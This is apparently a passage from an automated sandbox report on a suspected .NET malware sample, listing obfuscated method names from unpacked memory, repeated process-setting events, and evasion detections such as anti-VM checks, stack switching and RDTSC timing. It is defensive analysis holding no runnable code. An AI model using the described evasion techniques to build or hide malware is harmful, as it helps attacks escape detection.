          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, HGhi0FUsOXLFOeMsQC.csHigh entropy of concatenated method names: 'lTntT97akN', 'kj8tbOW9lW', 'kW0Wux1Gdy', 'pM9W0Sl4nl', 'XSXWxU4JDB', 'xfuWBnMrKh', 'DG6WrTxi0G', 'uhnWnvuSLE', 'Vg6W5VNHJS', 's7cW3s7T8c'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, r7j8ZUoBba3UAsBfuS.csHigh entropy of concatenated method names: 'kHudKkrqQe', 'jPmdwj2DWA', 'Aepd6Vfvyr', 'feydCllhAv', 'LR5dMFPFFZ', 'r7CdtK3TLx', 'G0qdGyvqQS', 'bdUAR946j7', 'SwyA85R2O9', 'FQKAF3rvXB'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, xI3VeQzRCXx8dlXd6g.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zamdVy242s', 'IFwdJv9MJR', 'cfadfy4pCC', 'mPAdUNsJkS', 'hvCdARttF9', 'S5IddHgTvE', 'mRZdctfCPY'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, I5ZtjtJ1PnhkfciJih.csHigh entropy of concatenated method names: 'rLDKmMmsoX', 'RmQKhEpjMR', 'SPDKSsM4u2', 'vvgKa0RIUm', 'znjKJOUnqB', 'IbMKfsKkXH', 'VPAB09uyEsTX31gJy3', 'aqU3o73n8sN2Qa1IZI', 'TxgKK7XerO', 'hKqKwL8eYF'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, LYSI6xYvfggcO86VAO.csHigh entropy of concatenated method names: 'PErVoLcPIb', 'keMV7D6tJT', 'hWuVyQeQkf', 'IX5Ve8ipBA', 'FFYV07HmrL', 'NOgVxi8YV7', 'kyOVrgpUJD', 'h7TVnMextZ', 'ejDV3qYfRx', 'eU1VYt6HQm'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, Cg6qJ4qwJswk0QmDWw.csHigh entropy of concatenated method names: 'UqrAC310Nv', 'DWKAMK5sE2', 'A6BAWLA7Fa', 'o0KAtOho3L', 'K5QAGrllOV', 'ti4AmOeTFY', 'BsQAhvw8SP', 'bHvADUSK1U', 'zuSASm2RtN', 'nXEAaF9t7q'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, A2eePvWE5tr18r7jM1.csHigh entropy of concatenated method names: 'lgnm1sauva', 'nO3mqGRVV7', 'm5emp9hu6a', 'z2emkki1MC', 'qa8mT6aA0C', 'KRkmjU5b3p', 'zegmbp7ok4', 'ekPmo9lOdl', 'hPQm7B7wZt', 'gJ8mLLXXFr'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, IIgmn1SW54HltgqZDT.csHigh entropy of concatenated method names: 'DhcWkIQfOm', 'U8nWjOgM4j', 'wALWoWlCmQ', 'JhPW72Y2r5', 'xfCWJLHJmk', 'uTKWfPdR3a', 'bXOWU2ELJJ', 'LuhWArDIOZ', 'HxuWdYoaso', 'MvYWcd5XZO'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, O6odxcCQeE0weh2llR.csHigh entropy of concatenated method names: 'VwZmC8yrey', 'NCEmWqLEwo', 'fLmmG33gRW', 'wExGHmuXmI', 'Xf1Gzix6ib', 'GHQmNTW09r', 'JYamKaVvn4', 'Hlsm4NTJ23', 'tSTmwJZdK1', 'fmxm62nEBr'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, jqNmxmQCLUwegVa6lt.csHigh entropy of concatenated method names: 'nfGMPKIphn', 'FYNMvd8YcH', 'vOpMl6MfG0', 'ffvMOYLghP', 'r1JMZDO82U', 'pJyMIvxOy5', 'eCsMRSLjif', 'xt6M8W1s96', 'E2SMFAm0ej', 'zogMHc0HoO'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, TrAdDgxbkPWXYdDAZX.csHigh entropy of concatenated method names: 'EqEG9kk4LW', 'su4GMBoaor', 'eUyGtxNArj', 'rQMGmd5qZw', 'LCfGhivMp5', 'nUUtZ5QHpC', 'jbetIYyyBd', 'j9StRTe9B6', 'HEqt8tD7Pq', 'GHTtFRLlAf'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, nsP6jHEVKbm0qMSRnq.csHigh entropy of concatenated method names: 'ToString', 'VcNfYRC8xs', 'KmKfeLqcSc', 'lHAfuBB0rM', 'O9bf0uIWcj', 'dsjfxcrIh1', 'KjqfBFPrQG', 'xwUfrh2CeX', 'ug7fn9HGyf', 'Xgsf5ouLMj'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, M8wl9t3SXMjI2strfx.csHigh entropy of concatenated method names: 'qiCUSnQcMp', 'Q54UainyaL', 'ToString', 'PWtUC20CJu', 'IKIUMkXtQE', 'Mg1UW3gJx4', 'laBUtgg5qy', 'MdJUG6Jqjy', 'Ot7UmNERfQ', 's8PUhhSYGE'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, oo1wXhGh2OZsvE9xUc.csHigh entropy of concatenated method names: 'VexJ3DLS2T', 'naLJgSWTHn', 'xEaJPXrhZ6', 'i9IJvY7m8Q', 'DNGJeLk3cn', 'PsRJuOE25o', 'MLyJ0OqBrh', 'BKbJxs6LtG', 'BchJB2WLxj', 'TZ8Jr71te6'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, TPBvMOHpYMDE4rXdmn.csHigh entropy of concatenated method names: 'Dispose', 'bU1KF2bPlQ', 'CYB4eSx32M', 'I1ysstjJah', 'yGIKH00bMB', 'FKkKzEcdjd', 'ProcessDialogKey', 'B0i4Nah8lp', 'Q8I4KEStLf', 'qDN44hvc1s'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, onEMYZPssEM9ipODqah.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'E89cPH9Hju', 'RQNcvKmLcJ', 'D00cliKtTj', 'WopcONCktE', 'tPicZZOl22', 'Y4LcIb4kpx', 'NEbcRp16VR'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, Nm8B0UVPYgNp4iEWC3.csHigh entropy of concatenated method names: 'fGYU8D0fT7', 'AHUUHf093S', 'g7uANNlqFW', 'C3wAKjloRG', 'T8ZUYog6Xw', 'eqCUgDrmSx', 'afrU2xIKer', 'eowUPwroHc', 'E4uUvZ9ZZk', 'yBlUlFsUaC'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, URuq7t1pp4AeVpLfjp.csHigh entropy of concatenated method names: 'uGXpvJHi9', 'AV4k76gcZ', 'MFlj9DetZ', 'GU7boBVGN', 'IpD75u7KT', 'WWLLCPZ7E', 'J7eT3UCtnbv7OM7ixk', 'SdbOpjF0pIFxlMa9Hl', 'YIlABuoG3', 'hqKcZC9uF'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, HMGOMwjOIIDnmkZuPO.csHigh entropy of concatenated method names: 'Lelw9Iu72t', 'cC9wCl81lD', 'E5bwMe9gyt', 'WPCwWDnpFc', 'f1wwt9hyXZ', 'N2swGhPFAN', 'kGdwm4EI3q', 'g76whZi0J5', 'VupwDOGJ0J', 'iyBwSLhvJb'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, B9GVVKPIXwO0PmUQSxH.csHigh entropy of concatenated method names: 'bSLd1ZpQ1f', 'G0adqwWTRP', 'NxSdpvZAQy', 'YgFdkBew3Y', 'wJEdT3CZGL', 'lMAdjTBY57', 'BaFdbhWhO4', 'IBYdoOcBeG', 'K7rd7DTgTs', 'yGidLCUfcw'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, HGhi0FUsOXLFOeMsQC.csHigh entropy of concatenated method names: 'lTntT97akN', 'kj8tbOW9lW', 'kW0Wux1Gdy', 'pM9W0Sl4nl', 'XSXWxU4JDB', 'xfuWBnMrKh', 'DG6WrTxi0G', 'uhnWnvuSLE', 'Vg6W5VNHJS', 's7cW3s7T8c'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, r7j8ZUoBba3UAsBfuS.csHigh entropy of concatenated method names: 'kHudKkrqQe', 'jPmdwj2DWA', 'Aepd6Vfvyr', 'feydCllhAv', 'LR5dMFPFFZ', 'r7CdtK3TLx', 'G0qdGyvqQS', 'bdUAR946j7', 'SwyA85R2O9', 'FQKAF3rvXB'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, xI3VeQzRCXx8dlXd6g.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zamdVy242s', 'IFwdJv9MJR', 'cfadfy4pCC', 'mPAdUNsJkS', 'hvCdARttF9', 'S5IddHgTvE', 'mRZdctfCPY'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, I5ZtjtJ1PnhkfciJih.csHigh entropy of concatenated method names: 'rLDKmMmsoX', 'RmQKhEpjMR', 'SPDKSsM4u2', 'vvgKa0RIUm', 'znjKJOUnqB', 'IbMKfsKkXH', 'VPAB09uyEsTX31gJy3', 'aqU3o73n8sN2Qa1IZI', 'TxgKK7XerO', 'hKqKwL8eYF'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, LYSI6xYvfggcO86VAO.csHigh entropy of concatenated method names: 'PErVoLcPIb', 'keMV7D6tJT', 'hWuVyQeQkf', 'IX5Ve8ipBA', 'FFYV07HmrL', 'NOgVxi8YV7', 'kyOVrgpUJD', 'h7TVnMextZ', 'ejDV3qYfRx', 'eU1VYt6HQm'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, Cg6qJ4qwJswk0QmDWw.csHigh entropy of concatenated method names: 'UqrAC310Nv', 'DWKAMK5sE2', 'A6BAWLA7Fa', 'o0KAtOho3L', 'K5QAGrllOV', 'ti4AmOeTFY', 'BsQAhvw8SP', 'bHvADUSK1U', 'zuSASm2RtN', 'nXEAaF9t7q'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, A2eePvWE5tr18r7jM1.csHigh entropy of concatenated method names: 'lgnm1sauva', 'nO3mqGRVV7', 'm5emp9hu6a', 'z2emkki1MC', 'qa8mT6aA0C', 'KRkmjU5b3p', 'zegmbp7ok4', 'ekPmo9lOdl', 'hPQm7B7wZt', 'gJ8mLLXXFr'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, IIgmn1SW54HltgqZDT.csHigh entropy of concatenated method names: 'DhcWkIQfOm', 'U8nWjOgM4j', 'wALWoWlCmQ', 'JhPW72Y2r5', 'xfCWJLHJmk', 'uTKWfPdR3a', 'bXOWU2ELJJ', 'LuhWArDIOZ', 'HxuWdYoaso', 'MvYWcd5XZO'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, O6odxcCQeE0weh2llR.csHigh entropy of concatenated method names: 'VwZmC8yrey', 'NCEmWqLEwo', 'fLmmG33gRW', 'wExGHmuXmI', 'Xf1Gzix6ib', 'GHQmNTW09r', 'JYamKaVvn4', 'Hlsm4NTJ23', 'tSTmwJZdK1', 'fmxm62nEBr'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, jqNmxmQCLUwegVa6lt.csHigh entropy of concatenated method names: 'nfGMPKIphn', 'FYNMvd8YcH', 'vOpMl6MfG0', 'ffvMOYLghP', 'r1JMZDO82U', 'pJyMIvxOy5', 'eCsMRSLjif', 'xt6M8W1s96', 'E2SMFAm0ej', 'zogMHc0HoO'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, TrAdDgxbkPWXYdDAZX.csHigh entropy of concatenated method names: 'EqEG9kk4LW', 'su4GMBoaor', 'eUyGtxNArj', 'rQMGmd5qZw', 'LCfGhivMp5', 'nUUtZ5QHpC', 'jbetIYyyBd', 'j9StRTe9B6', 'HEqt8tD7Pq', 'GHTtFRLlAf'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, nsP6jHEVKbm0qMSRnq.csHigh entropy of concatenated method names: 'ToString', 'VcNfYRC8xs', 'KmKfeLqcSc', 'lHAfuBB0rM', 'O9bf0uIWcj', 'dsjfxcrIh1', 'KjqfBFPrQG', 'xwUfrh2CeX', 'ug7fn9HGyf', 'Xgsf5ouLMj'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, M8wl9t3SXMjI2strfx.csHigh entropy of concatenated method names: 'qiCUSnQcMp', 'Q54UainyaL', 'ToString', 'PWtUC20CJu', 'IKIUMkXtQE', 'Mg1UW3gJx4', 'laBUtgg5qy', 'MdJUG6Jqjy', 'Ot7UmNERfQ', 's8PUhhSYGE'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, oo1wXhGh2OZsvE9xUc.csHigh entropy of concatenated method names: 'VexJ3DLS2T', 'naLJgSWTHn', 'xEaJPXrhZ6', 'i9IJvY7m8Q', 'DNGJeLk3cn', 'PsRJuOE25o', 'MLyJ0OqBrh', 'BKbJxs6LtG', 'BchJB2WLxj', 'TZ8Jr71te6'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, TPBvMOHpYMDE4rXdmn.csHigh entropy of concatenated method names: 'Dispose', 'bU1KF2bPlQ', 'CYB4eSx32M', 'I1ysstjJah', 'yGIKH00bMB', 'FKkKzEcdjd', 'ProcessDialogKey', 'B0i4Nah8lp', 'Q8I4KEStLf', 'qDN44hvc1s'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, onEMYZPssEM9ipODqah.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'E89cPH9Hju', 'RQNcvKmLcJ', 'D00cliKtTj', 'WopcONCktE', 'tPicZZOl22', 'Y4LcIb4kpx', 'NEbcRp16VR'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, Nm8B0UVPYgNp4iEWC3.csHigh entropy of concatenated method names: 'fGYU8D0fT7', 'AHUUHf093S', 'g7uANNlqFW', 'C3wAKjloRG', 'T8ZUYog6Xw', 'eqCUgDrmSx', 'afrU2xIKer', 'eowUPwroHc', 'E4uUvZ9ZZk', 'yBlUlFsUaC'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, URuq7t1pp4AeVpLfjp.csHigh entropy of concatenated method names: 'uGXpvJHi9', 'AV4k76gcZ', 'MFlj9DetZ', 'GU7boBVGN', 'IpD75u7KT', 'WWLLCPZ7E', 'J7eT3UCtnbv7OM7ixk', 'SdbOpjF0pIFxlMa9Hl', 'YIlABuoG3', 'hqKcZC9uF'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, HMGOMwjOIIDnmkZuPO.csHigh entropy of concatenated method names: 'Lelw9Iu72t', 'cC9wCl81lD', 'E5bwMe9gyt', 'WPCwWDnpFc', 'f1wwt9hyXZ', 'N2swGhPFAN', 'kGdwm4EI3q', 'g76whZi0J5', 'VupwDOGJ0J', 'iyBwSLhvJb'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, B9GVVKPIXwO0PmUQSxH.csHigh entropy of concatenated method names: 'bSLd1ZpQ1f', 'G0adqwWTRP', 'NxSdpvZAQy', 'YgFdkBew3Y', 'wJEdT3CZGL', 'lMAdjTBY57', 'BaFdbhWhO4', 'IBYdoOcBeG', 'K7rd7DTgTs', 'yGidLCUfcw'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, HGhi0FUsOXLFOeMsQC.csHigh entropy of concatenated method names: 'lTntT97akN', 'kj8tbOW9lW', 'kW0Wux1Gdy', 'pM9W0Sl4nl', 'XSXWxU4JDB', 'xfuWBnMrKh', 'DG6WrTxi0G', 'uhnWnvuSLE', 'Vg6W5VNHJS', 's7cW3s7T8c'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, r7j8ZUoBba3UAsBfuS.csHigh entropy of concatenated method names: 'kHudKkrqQe', 'jPmdwj2DWA', 'Aepd6Vfvyr', 'feydCllhAv', 'LR5dMFPFFZ', 'r7CdtK3TLx', 'G0qdGyvqQS', 'bdUAR946j7', 'SwyA85R2O9', 'FQKAF3rvXB'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, xI3VeQzRCXx8dlXd6g.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zamdVy242s', 'IFwdJv9MJR', 'cfadfy4pCC', 'mPAdUNsJkS', 'hvCdARttF9', 'S5IddHgTvE', 'mRZdctfCPY'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, I5ZtjtJ1PnhkfciJih.csHigh entropy of concatenated method names: 'rLDKmMmsoX', 'RmQKhEpjMR', 'SPDKSsM4u2', 'vvgKa0RIUm', 'znjKJOUnqB', 'IbMKfsKkXH', 'VPAB09uyEsTX31gJy3', 'aqU3o73n8sN2Qa1IZI', 'TxgKK7XerO', 'hKqKwL8eYF'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, LYSI6xYvfggcO86VAO.csHigh entropy of concatenated method names: 'PErVoLcPIb', 'keMV7D6tJT', 'hWuVyQeQkf', 'IX5Ve8ipBA', 'FFYV07HmrL', 'NOgVxi8YV7', 'kyOVrgpUJD', 'h7TVnMextZ', 'ejDV3qYfRx', 'eU1VYt6HQm'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, Cg6qJ4qwJswk0QmDWw.csHigh entropy of concatenated method names: 'UqrAC310Nv', 'DWKAMK5sE2', 'A6BAWLA7Fa', 'o0KAtOho3L', 'K5QAGrllOV', 'ti4AmOeTFY', 'BsQAhvw8SP', 'bHvADUSK1U', 'zuSASm2RtN', 'nXEAaF9t7q'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, A2eePvWE5tr18r7jM1.csHigh entropy of concatenated method names: 'lgnm1sauva', 'nO3mqGRVV7', 'm5emp9hu6a', 'z2emkki1MC', 'qa8mT6aA0C', 'KRkmjU5b3p', 'zegmbp7ok4', 'ekPmo9lOdl', 'hPQm7B7wZt', 'gJ8mLLXXFr'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, IIgmn1SW54HltgqZDT.csHigh entropy of concatenated method names: 'DhcWkIQfOm', 'U8nWjOgM4j', 'wALWoWlCmQ', 'JhPW72Y2r5', 'xfCWJLHJmk', 'uTKWfPdR3a', 'bXOWU2ELJJ', 'LuhWArDIOZ', 'HxuWdYoaso', 'MvYWcd5XZO'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, O6odxcCQeE0weh2llR.csHigh entropy of concatenated method names: 'VwZmC8yrey', 'NCEmWqLEwo', 'fLmmG33gRW', 'wExGHmuXmI', 'Xf1Gzix6ib', 'GHQmNTW09r', 'JYamKaVvn4', 'Hlsm4NTJ23', 'tSTmwJZdK1', 'fmxm62nEBr'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, jqNmxmQCLUwegVa6lt.csHigh entropy of concatenated method names: 'nfGMPKIphn', 'FYNMvd8YcH', 'vOpMl6MfG0', 'ffvMOYLghP', 'r1JMZDO82U', 'pJyMIvxOy5', 'eCsMRSLjif', 'xt6M8W1s96', 'E2SMFAm0ej', 'zogMHc0HoO'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, TrAdDgxbkPWXYdDAZX.csHigh entropy of concatenated method names: 'EqEG9kk4LW', 'su4GMBoaor', 'eUyGtxNArj', 'rQMGmd5qZw', 'LCfGhivMp5', 'nUUtZ5QHpC', 'jbetIYyyBd', 'j9StRTe9B6', 'HEqt8tD7Pq', 'GHTtFRLlAf'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, nsP6jHEVKbm0qMSRnq.csHigh entropy of concatenated method names: 'ToString', 'VcNfYRC8xs', 'KmKfeLqcSc', 'lHAfuBB0rM', 'O9bf0uIWcj', 'dsjfxcrIh1', 'KjqfBFPrQG', 'xwUfrh2CeX', 'ug7fn9HGyf', 'Xgsf5ouLMj'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, M8wl9t3SXMjI2strfx.csHigh entropy of concatenated method names: 'qiCUSnQcMp', 'Q54UainyaL', 'ToString', 'PWtUC20CJu', 'IKIUMkXtQE', 'Mg1UW3gJx4', 'laBUtgg5qy', 'MdJUG6Jqjy', 'Ot7UmNERfQ', 's8PUhhSYGE'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, oo1wXhGh2OZsvE9xUc.csHigh entropy of concatenated method names: 'VexJ3DLS2T', 'naLJgSWTHn', 'xEaJPXrhZ6', 'i9IJvY7m8Q', 'DNGJeLk3cn', 'PsRJuOE25o', 'MLyJ0OqBrh', 'BKbJxs6LtG', 'BchJB2WLxj', 'TZ8Jr71te6'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, TPBvMOHpYMDE4rXdmn.csHigh entropy of concatenated method names: 'Dispose', 'bU1KF2bPlQ', 'CYB4eSx32M', 'I1ysstjJah', 'yGIKH00bMB', 'FKkKzEcdjd', 'ProcessDialogKey', 'B0i4Nah8lp', 'Q8I4KEStLf', 'qDN44hvc1s'
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: Process Memory Space: 8tvMmyxveyzFcnJ.exe PID: 6740, type: MEMORYSTR
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeAPI/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Tries to detect virtualization through RDTSC time measurements
